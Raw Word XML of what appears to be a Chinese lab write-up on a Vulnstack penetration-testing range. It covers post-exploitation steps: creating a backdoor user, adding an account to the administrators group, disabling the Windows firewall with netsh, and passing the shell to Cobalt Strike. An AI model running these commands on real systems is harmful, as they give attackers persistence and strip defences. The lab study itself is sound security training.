    <w:p w14:paraId="0AFC36E1" w14:textId="77777777" w:rsidR="00810C9F" w:rsidRPr="00D26CCA" w:rsidRDefault="00810C9F" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E780903" w14:textId="7C75DBDC" w:rsidR="00515E3A" w:rsidRDefault="00A20D09" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pP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为后渗透阶段做准备工作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5080906A" w14:textId="6F311855" w:rsidR="00A20D09" w:rsidRDefault="00A20D09" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="497F6F50" w14:textId="279C879C" w:rsidR="00A20D09" w:rsidRDefault="00003D33" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A20D09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68929287" w14:textId="2C0082BD" w:rsidR="003A5A06" w:rsidRDefault="00B834A7" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B834A7">
        <w:t xml:space="preserve">net user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B834A7">
        <w:t>lmety</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B834A7">
        <w:t xml:space="preserve"> Admin123 /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4814C172" w14:textId="35344AE6" w:rsidR="00515E3A" w:rsidRDefault="00B834A7" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68121D5A" wp14:editId="4708BC80">
            <wp:extent cx="5274310" cy="4610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2F93" w14:textId="3A17A888" w:rsidR="00B834A7" w:rsidRDefault="00003D33" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B834A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将用户添加到</w:t>
      </w:r>
      <w:r w:rsidR="00B834A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>administrator</w:t>
      </w:r>
      <w:r w:rsidR="00B834A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D93D046" w14:textId="3957687D" w:rsidR="00827986" w:rsidRDefault="00827986" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>adminstrators</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> guest /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BADF942" w14:textId="5CA0DC71" w:rsidR="00B834A7" w:rsidRDefault="00827986" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2235CB72" wp14:editId="762B4AE4">
            <wp:extent cx="5274310" cy="553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1F21" w14:textId="03C1FC82" w:rsidR="00515E3A" w:rsidRDefault="00827986" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00003D33">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>添加失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因为电脑性能原因只开启了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这一台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器，先完成外围打点渗透。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E88C04" w14:textId="77777777" w:rsidR="00827986" w:rsidRDefault="00827986" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07DEB3EF" w14:textId="24F94C8F" w:rsidR="00515E3A" w:rsidRDefault="00003D33" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="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关闭防火墙</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFABE07" w14:textId="5492E3B9" w:rsidR="00003D33" w:rsidRDefault="00003D33" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00003D33">
        <w:t>netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00003D33">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00003D33">
        <w:t>advfirewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00003D33">
        <w:t xml:space="preserve"> set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00003D33">
        <w:t>allprofiles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00003D33">
        <w:t xml:space="preserve"> state off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22370ACC" w14:textId="2B55CDD3" w:rsidR="00003D33" w:rsidRDefault="00003D33" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F4D4A77" wp14:editId="2578EE2C">
            <wp:extent cx="5274310" cy="330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A640" w14:textId="32158339" w:rsidR="00003D33" w:rsidRDefault="00003D33" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看防火墙状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E57F7CC" w14:textId="12497485" w:rsidR="00003D33" w:rsidRDefault="00003D33" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7997F8F3" wp14:editId="28925EBE">
            <wp:extent cx="5274310" cy="1003935"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="13" name="图片 13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&#10;&#10;中度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DDE1" w14:textId="2CEDDA51" w:rsidR="00003D33" w:rsidRDefault="00003D33" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6580BC3C" wp14:editId="2A1CC63D">
            <wp:extent cx="5274310" cy="961390"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="16" name="图片 16" descr="形状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形状&#10;&#10;低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2C31" w14:textId="58A9C315" w:rsidR="00003D33" w:rsidRDefault="00003D33" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61B52BEB" w14:textId="5D10E186" w:rsidR="00003D33" w:rsidRDefault="00810C9F" w:rsidP="005803D6">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内网渗透</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA8BCE6" w14:textId="4363C0FC" w:rsidR="005803D6" w:rsidRDefault="005803D6" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64EF6015" w14:textId="5AC22843" w:rsidR="005803D6" w:rsidRDefault="002F6B61" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/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将服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>派生到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cobaltstrike</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6B7ADAAA" w14:textId="6323ADD5" w:rsidR="005803D6" w:rsidRDefault="005803D6" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AD0AACE" w14:textId="62358649" w:rsidR="005803D6" w:rsidRDefault="005803D6" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A6D9CA0" w14:textId="77777777" w:rsidR="005803D6" w:rsidRPr="00515E3A" w:rsidRDefault="005803D6" w:rsidP="00682028">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="005803D6" w:rsidRPr="00515E3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DEDB" w14:textId="77777777" w:rsidR="00E53980" w:rsidRDefault="00E53980" w:rsidP="004149C7">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="39DFD570" w14:textId="77777777" w:rsidR="00E53980" w:rsidRDefault="00E53980" w:rsidP="004149C7">
      <w:pPr>
        <w:ind w:left="84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63B2" w14:textId="77777777" w:rsidR="007C37E3" w:rsidRDefault="007C37E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98E8" w14:textId="77777777" w:rsidR="007C37E3" w:rsidRDefault="007C37E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EE42" w14:textId="77777777" w:rsidR="007C37E3" w:rsidRDefault="007C37E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42AF" w14:textId="77777777" w:rsidR="00E53980" w:rsidRDefault="00E53980" w:rsidP="004149C7">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="22C93745" w14:textId="77777777" w:rsidR="00E53980" w:rsidRDefault="00E53980" w:rsidP="004149C7">
      <w:pPr>
        <w:ind w:left="84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08E6" w14:textId="77777777" w:rsidR="007C37E3" w:rsidRDefault="007C37E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7BAC" w14:textId="77777777" w:rsidR="007C37E3" w:rsidRDefault="007C37E3" w:rsidP="007C37E3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2A79" w14:textId="77777777" w:rsidR="007C37E3" w:rsidRDefault="007C37E3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E"/>
    <w:rsid w:val="00003D33"/>
    <w:rsid w:val="00075769"/>
    <w:rsid w:val="000A1C3E"/>
    <w:rsid w:val="000A342B"/>
    <w:rsid w:val="000C679C"/>
    <w:rsid w:val="000D6077"/>
    <w:rsid w:val="00113DE9"/>
    <w:rsid w:val="001A4F12"/>
    <w:rsid w:val="00204343"/>
    <w:rsid w:val="0021694F"/>
    <w:rsid w:val="0028120A"/>
    <w:rsid w:val="002F6B61"/>
    <w:rsid w:val="0031792F"/>
    <w:rsid w:val="003A5A06"/>
    <w:rsid w:val="003F34DE"/>
    <w:rsid w:val="004149C7"/>
    <w:rsid w:val="004226D9"/>
    <w:rsid w:val="00437ABE"/>
    <w:rsid w:val="00515E3A"/>
    <w:rsid w:val="005803D6"/>
    <w:rsid w:val="00610D79"/>
    <w:rsid w:val="00650D70"/>
    <w:rsid w:val="00682028"/>
    <w:rsid w:val="0069311D"/>
    <w:rsid w:val="006E7889"/>
    <w:rsid w:val="00701FC4"/>
    <w:rsid w:val="00707E36"/>
    <w:rsid w:val="00726387"/>
    <w:rsid w:val="007B3EB1"/>
    <w:rsid w:val="007C37E3"/>
    <w:rsid w:val="00810C9F"/>
    <w:rsid w:val="00827986"/>
    <w:rsid w:val="008360D9"/>
    <w:rsid w:val="00941C8B"/>
    <w:rsid w:val="009904AD"/>
    <w:rsid w:val="009C5293"/>
    <w:rsid w:val="00A131A9"/>
    <w:rsid w:val="00A20D09"/>
    <w:rsid w:val="00B72D63"/>
    <w:rsid w:val="00B834A7"/>
    <w:rsid w:val="00B918B8"/>
    <w:rsid w:val="00BB21B9"/>
    <w:rsid w:val="00BD4BCE"/>
    <w:rsid w:val="00C77AB8"/>
    <w:rsid w:val="00D26CCA"/>
    <w:rsid w:val="00DA20DA"/>
    <w:rsid w:val="00E53980"/>
    <w:rsid w:val="00EB0AEE"/>
    <w:rsid w:val="00EE7D66"/>
    <w:rsid w:val="00EF23DF"/>
    <w:rsid w:val="00F5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FA8C9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{39D6F5C6-A622-42CA-91DB-3B3FC158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077"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:ind w:firstLineChars="200" w:firstLine="20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next w:val="a"/>
    <w:link w:val="a4"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="000A342B"/>
    <w:pPr>
      <w:widowControl/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a4">
    <w:name w:val="一级标题 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a3"/>
    <w:rsid w:val="000A342B"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs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14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49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4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49C7"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a9">
    <w:name w:val="二级标题"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="aa"/>
    <w:qFormat/>
    <w:rsid w:val="004149C7"/>
    <w:pPr>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ab">
    <w:name w:val="三级标题"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="ac"/>
    <w:qFormat/>
    <w:rsid w:val="000D6077"/>
    <w:pPr>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:szCs w:val="21"/>
      <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aa">
    <w:name w:val="二级标题 字符"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="a9"/>
    <w:rsid w:val="004149C7"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ad">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="000D6077"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ac">
    <w:name w:val="三级标题 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ab"/>
    <w:rsid w:val="000D6077"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:szCs w:val="21"/>
      <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ae">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000D607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8202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8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://vulnstack.qiyuanxuetang.net/vuln/detail/2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0650-88C6-42FC-B9FF-7D15070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tY</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>知 夏</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-10-13T02:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-13T15:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>